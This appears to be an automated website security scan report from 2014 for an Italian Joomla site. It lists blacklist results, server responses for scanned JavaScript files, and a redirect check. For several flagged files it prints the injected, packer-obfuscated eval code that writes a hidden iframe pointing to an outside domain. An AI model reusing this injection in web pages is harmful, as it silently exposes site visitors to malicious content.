Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bricomatt.it
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://bricomatt.it/
Result: The website is marked by Yandex as suspicious: visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://bricomatt.it/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 20 Sep 2014 18:07:27 GMT Location: http://www.bricomatt.it/ Server: Apache Content-Length: 232 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.bricomatt.it/ | 200 OK Content-Length: 70889 Content-Type: text/html | clean |
http://www.bricomatt.it/media/system/js/mootools-core.js | 200 OK Content-Length: 96790 Content-Type: application/javascript | clean |
http://bricomatt.it/media/system/js/core.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 20 Sep 2014 18:07:30 GMT Location: http://www.bricomatt.it/media/system/js/core.js Server: Apache Content-Length: 255 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.bricomatt.it/media/system/js/core.js | 200 OK Content-Length: 5211 Content-Type: application/javascript | malicious |
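Malicious code - confirmed by antiviruses (see below) if("undefined"===typeof Joomla)var Joomla={};Joomla.editors={};Joomla.editors.instances={};Joomla.submitform=function(a,b){if("undefined"===typeof b&&(b=document.getElementById("adminForm"),!b))b=document.adminForm;if("undefined"!==typeof a&&''!==a)b.task.value=a;if("function"==typeof b.onsubmit)b.onsubmit();"function"==typeof b.fireEvent&&b.fireEvent("submit");b.submit()};Joomla.submitbutton=function(a){Joomla.submitform(a)}; Joomla.JText={strings:{},_:function(a,b){ <!-- . -->;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.7(\'<0 4="5://6-1.8/?9=2" a="b:c;"></0>\');',13,13,'iframe|statistic||document|src|http|g|write|info|id|style|display|none'.split('|'),0,{})); <!-- . --> Note: the eval(function(p,a,c,k,e,r){...}) block appended after the Joomla code is packer-style obfuscation. Substituting its word list into the packed string gives a document.write call that inserts an iframe styled display:none, with its src set to hxxp://g-statistic[.]info/?id=2 (defanged here). The same packed block appears in full in the menu.gkmenu.js and gk.scripts.js excerpts in this report and in truncated form in the k2.js excerpt, so the flagged files appear to carry the same appended injection. Antivirus reports: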
| ||
http://bricomatt.it/media/system/js/modal.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 20 Sep 2014 18:07:31 GMT Location: http://www.bricomatt.it/media/system/js/modal.js Server: Apache Content-Length: 256 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.bricomatt.it/media/system/js/modal.js | 200 OK Content-Length: 10159 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var SqueezeBox={presets:{onOpen:function(){},onClose:function(){},onUpdate:function(){},onResize:function(){},onMove:function(){},onShow:function(){},onHide:function(){},size:{x:600,y:450},sizeLoading:{x:200,y:150},marginInner:{x:20,y:20},marginImage:{x:50,y:75},handler:!1,target:null,closable:!0,closeBtn:!0,zIndex:65555,overlayOpacity:0.7,classWindow:"",classOverlay:"",overlayFx:{},resizeFx:{},contentFx:{},parse:!1,parseSecure:!1,shadow:!0,overlay:!0,document:null,ajaxOptions:{}},initialize:fun <!-- . --> Antivirus reports:
| ||
http://bricomatt.it//ajax.googleapis.com/ajax/libs/jquery/1.6/jquery.min.js/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 20 Sep 2014 18:07:31 GMT Location: http://www.bricomatt.it//ajax.googleapis.com/ajax/libs/jquery/1.6/jquery.min.js/ Server: Apache Content-Length: 288 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.bricomatt.it//ajax.googleapis.com/ajax/libs/jquery/1.6/jquery.min.js/ | 404 Not Found Content-Length: 253 Content-Type: text/html | clean |
http://www.bricomatt.it/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://bricomatt.it/media/k2/assets/js/k2.noconflict.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 20 Sep 2014 18:07:31 GMT Location: http://www.bricomatt.it/media/k2/assets/js/k2.noconflict.js Server: Apache Content-Length: 267 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.bricomatt.it/media/k2/assets/js/k2.noconflict.js | 200 OK Content-Length: 347 Content-Type: application/javascript | clean |
http://bricomatt.it/components/com_k2/js/k2.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 20 Sep 2014 18:07:32 GMT Location: http://www.bricomatt.it/components/com_k2/js/k2.js Server: Apache Content-Length: 258 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.bricomatt.it/components/com_k2/js/k2.js | 200 OK Content-Length: 7750 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var $K2 = jQuery.noConflict(); $K2(document).ready(function(){ $K2('#comment-form').submit(function(event){ event.preventDefault(); $K2('#formLog').empty().addClass('formLogLoading'); $K2.ajax({ url: $K2('#comment-form').attr('action'), type: 'post', dataType: 'json', data: $K2('#comment-form').serialize(), success: function(response){ $K2('#formLog').removeClass('formLogLoading').html(response.message); if(typeof(Rec var maxHeight = 0; blocks.each(function(){ maxHeight = Math.max(maxHeight, parseInt($K2(this).css('height'))); }); blocks.css('height', maxHeight); }); <!-- . -->;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.7(\'<0 4="5:<!-- . --> Antivirus reports:
| ||
http://bricomatt.it/media/system/js/caption.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 20 Sep 2014 18:07:33 GMT Location: http://www.bricomatt.it/media/system/js/caption.js Server: Apache Content-Length: 258 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.bricomatt.it/media/system/js/caption.js | 200 OK Content-Length: 1156 Content-Type: application/javascript | clean |
http://bricomatt.it/media/system/js/mootools-more.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 20 Sep 2014 18:07:33 GMT Location: http://www.bricomatt.it/media/system/js/mootools-more.js Server: Apache Content-Length: 264 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.bricomatt.it/media/system/js/mootools-more.js | 200 OK Content-Length: 238759 Content-Type: application/javascript | clean |
http://www.bricomatt.it/templates/gk_twn2/js/menu.gkmenu.js | 200 OK Content-Length: 4618 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) window.addEvent('load', function() { if(document.id('gkMainMenu')) { document.getElements('#gkMainMenu ul li span').each(function(el) { el.setProperty('onmouseover', ''); }); document.getElements('#gkMainMenu ul li a').each(function(el) { el.setProperty('onmouseover', ''); if(el.getParent().hasClass('haschild') && document.getElement('body').getProperty('data-tablet') != null) { } } }); <!-- . -->;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.7(\'<0 4="5://6-1.8/?9=2" a="b:c;"></0>\');',13,13,'iframe|statistic||document|src|http|g|write|info|id|style|display|none'.split('|'),0,{})); <!-- . --> Antivirus reports:
| ||
http://www.bricomatt.it/templates/gk_twn2/js/gk.scripts.js | 200 OK Content-Length: 5198 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) window.addEvent('domready', function(){ new SmoothScroll(); if(document.id('gkStyleArea')){ $$('#gkStyleArea a').each(function(element,index){ element.addEvent('click',function(e){ e.stop(); changeStyle(index+1); }); }); } if(document.id('gkTools') && document.id('gkComponentWrap')) { var current_fs = 100; var content_fx = new Fx.Tween(document.id('gkComponentWrap'), { property: 'font-size', unit }<!-- . -->;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.7(\'<0 4="5://6-1.8/?9=2" a="b:c;"></0>\');',13,13,'iframe|statistic||document|src|http|g|write|info|id|style|display|none'.split('|'),0,{})); <!-- . --> Antivirus reports:
| ||
http://bricomatt.it/media/system/js/validate.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 20 Sep 2014 18:07:35 GMT Location: http://www.bricomatt.it/media/system/js/validate.js Server: Apache Content-Length: 259 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.bricomatt.it/media/system/js/validate.js | 200 OK Content-Length: 3350 Content-Type: application/javascript | clean |
http://www.google.com/recaptcha/api/js/recaptcha_ajax.js | 200 OK Content-Length: 115874 Content-Type: text/javascript | clean |
http://www.bricomatt.it/modules/mod_news_pro_gk4/interface/scripts/engine.js | 200 OK Content-Length: 8034 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bricomatt.it
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 20 Sep 2014 18:07:27 GMT
Location: http://www.bricomatt.it/
Server: Apache
Content-Length: 232
Content-Type: text/html; charset=iso-8859-1
...232 bytes of data.
GET / HTTP/1.1
Host: bricomatt.it
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 20 Sep 2014 18:07:27 GMT
Location: http://www.bricomatt.it/
Server: Apache
Content-Length: 232
Content-Type: text/html; charset=iso-8859-1
...232 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: bricomatt.it
Referer: http://www.google.com/search?q=bricomatt.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bricomatt.it
Referer: http://www.google.com/search?q=bricomatt.it
Result:
The result is similar to the first query. There are no suspicious redirects found.